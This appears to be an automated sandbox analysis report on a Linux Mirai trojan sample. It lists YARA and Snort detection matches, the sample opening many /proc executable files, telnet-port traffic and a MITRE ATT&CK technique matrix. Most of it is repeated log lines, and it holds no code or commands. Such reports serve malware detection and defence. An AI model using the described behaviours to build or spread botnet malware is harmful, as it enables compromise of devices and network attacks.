Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal100.spre.troj.linELF@0/0@2/0

Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1185/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3241/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3483/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1732/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1730/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1333/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1695/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3235/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3234/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/911/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/515/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/914/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1617/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1615/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/917/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3255/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3253/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1591/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3252/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3251/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3250/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1623/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/5828/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1588/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3249/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/764/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3368/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1585/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3246/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3488/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/766/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/800/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/888/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/802/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1509/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/803/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/804/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3800/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3801/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1867/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1484/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/490/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1514/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1634/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1479/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1875/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/654/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3379/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/655/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/656/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/777/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/931/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1595/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/657/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/812/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/779/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/658/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/933/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/418/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/419/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3419/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3310/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3275/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3274/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3273/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3394/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3272/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/782/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3706/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3303/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1762/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3027/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1486/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/789/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1806/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/5722/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1660/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3440/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/793/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/794/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3316/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/674/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/796/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/675/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/676/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1498/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1497/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1496/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3157/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3278/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3399/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3798/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3799/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1659/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/5992/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3332/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3210/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3298/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3052/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/680/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/681/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3292/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1701/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/1666/exe	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	File opened: /proc/3205/exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60208
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60226
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60234
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60326
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60340
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60344
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60354
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60368
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60424

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality

Detected Mirai

Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	1 OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	11 Non-Standard Port	Exfiltration Over Other Network Medium	1 Service Stop
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Malware Configuration

